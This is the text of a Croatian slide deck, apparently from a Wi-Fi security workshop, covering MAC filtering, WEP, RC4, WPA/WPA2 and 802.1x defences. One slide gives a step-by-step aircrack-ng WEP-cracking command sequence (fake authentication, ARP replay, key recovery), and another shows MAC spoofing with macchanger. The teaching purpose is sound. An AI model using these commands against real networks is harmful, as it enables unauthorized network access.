2. Pregled radionice Legalni aspekti Jednostavnost kao nedostatak MAC adresa Filtriranje MAC adresa Demonstacija – sniffing paketa WEP enkripcija Demonstracija – WEP cracking RC4 algoritam WPA enkripcija Kako se zaštitit
3. Legalni aspekti i hrvatski zakoni Zakoni u RH... Tko i kada smije testirati sigurnost? Ostaviti nezaštićen wireless AP susjedima?
4. Uvod Jednostavnost kao nedostatak Bežične mreže su jednostavne za postaviti, brze i efikasne – to im je i glavni nedostatak Jednostavno - Plug & Play (iz trgovine) Zaštita ugašena po defaultu ili WEP zaštita koja nije dovoljno sigurna
9. Uvod - MAC ADRESSA M edia A ccess C ontrol address ili E thernet H ardware A ddress (EHA) 48 bitna unikatna oznaka fizičkog ethernet sučelja # ifconfig ili ipconfig /all eth0 Link encap:Ethernet HWaddr 00:1B:24:E7:8A:D2 wlan0 Link encap:Ethernet HWaddr 00:1B:77:7C:B7:A4 Quanta – 00:1B:24 Intel – 00:1B:77
10.
11. Filtriranje MAC adresa Na prvi pogled izgleda kao savršeno rješenje za ograničenje pristupa bežičnoj mreži MAC adresa je neenkriptirana u zaglavlju svakoga paketa Dovoljno je presresti jedan paket i klonirati MAC adresu # macchanger eth0 -r Current MAC: a2:cf:23:5b:b4:ec (unknown) Faked MAC: b4:8c:43:0d:74:ca (unknown)
12.
13.
14. RC4 enkripcijski algoritam (uvod u WEP protokol) RC4 - generator pseudo-nasumičnog niza brojeva Ako se odbaci prvih 256 bytea nakon toga se dobiju se dobri pseudo nasumični brojevi Početak RC4 niza podataka je predvidiv
15. WEP protokol za enkripciju Što je WEP protokol? WEP koristi vrlo dobar RC4 kriptografski algoritam Statični enkripcijski ključ (ne mijenja s vremenom) 24 bitni brojač na početku paketa Initialization Vector (IV) Autentikacija wireless klijenata – shared ili open (primjer autentikacije - slanje i primanje poruke)
16. WEP protokol Dužina WEP ključeva? 64 i 128 bitni WEP ključevi (zapravo 40 i 104 bitni) 24 bitni RC4 brojač na početku WEP ključa 24+40=64 ; 24+104=128 40 bita = 5 znakova (5*8=40) 104 bita = 13 znakova (13*8=104)
17. WEP protokol WEP protokol počiva u miru Kreirali su ju inženjeri ne stručnjaci za šifriranje WEP koristi vrlo dobar RC4 kriptografski algoritam Loša implementacija RC4 algoritma
18. Napadi na WEP protokol Sniffingom se sazna dovoljno podataka (kanal, MAC klijenta, MAC AP-a) Replay napad (uhvati se jedan ARP paket i ponovo se šalje) Sniffingom se prepoznaju loši ključevi (IV - Initialization Vector paketi) 5,000,000 paketa potrebno (05/2007) Sada je dovoljno 40,000 paketa
19. Sažetak WEP protokol počiva u miru WEP protokol ima jako puno propusta Lagano se generira puno prometa (replay attack) 40,000 paketa potrebno za razbijanje šifre (par minuta na mreži s puno prometa)
23. Demonstracija – WEP cracking Saznati kanal AP-a i MAC od AP-a i od spojenih klijenata http://www.aircrack-ng.org/doku.php?id=simple_wep_crack http://www.aircrack-ng.org/doku.php?id=tutorial
24. Demonstracija – WEP cracking Podesimo wireless karticu na kanal AP-a: airmon-ng start <wifi sučelje> <AP kanal> Sav promet koji ide na tom kanalu za taj AP snimamo u log file: airodump-ng -c <kanal> --bssid <AP MAC> -w <ime> <wifi sučelje> Lažna autentikacija na AP (da bi mogli slati svoje pakete): aireplay-ng -1 6000 -o 1 -q 10 -e <SSID> -a <AP MAC> -h <klijent MAC> <wifi sučelje> ARP replay napad (generira puno prometa): aireplay-ng -3 -b <AP MAC> -h <klijent MAC> <wifi sučelje> Analiza ključeva ili "crackiranje" nakon dovoljno skupljenih paketa: aircrack-ng -b <AP MAC> <ime>-01.cap
25.
26.
27.
28.
29. WPA (Wi-Fi Protected Access) WPA nije algoritam niti protokol. Što je WPA? WPA je certifikat koji neki proizvođač dobije ako njegova oprema zadovolji određen skup pravila Protokol koji se koristi je TKIP ( T emporal K ey I ntegrity P rotocol) RC4 ili AES enkripcijski algoritmi koji se koriste
31. WPA2 CCMP – je protokol koji se koristi i zamijenio je TKIP Counter Mode with Cipher Block Chaining Message Authentication Code AES je enkripcijski algoritam s kojim se kodiraju poruke
32. Zaštita od “unutrašnjeg neprijatelja” Čak ni savršena zaštita vas ne štiti od “unutrašnjeg neprijatelja” Unutar firme ili neke organizacije mogu postojati zlonamjerni ljudi ili bivši članovi (zaposlenici) koji i dalje imaju šifru. Jedini rješenje je primjena 802.1x autentikacije (radius server) Putem 802.1x autentikacije za svakog klijenta jedinstveno se generira ključ putem korisničkog imena i šifre.
33. Kako se zaštititi https://www.grc.com/passwords.htm E2255193A3359B82FBBB1CF6E2189D7F0D07B844F9A1EDA4974D2CDAD89C1C6C C9ggsUW5ElYYXW2AgUTvSCrgGHjUESj5NDZstXRz24A8N6mhLmwbnytsj8ML56H "i]yniz|=JZ1|&jgIfzrI'VDt?O?b7)_BWky,el)6)hpEL)_$)bT(ZH`iIhMi[2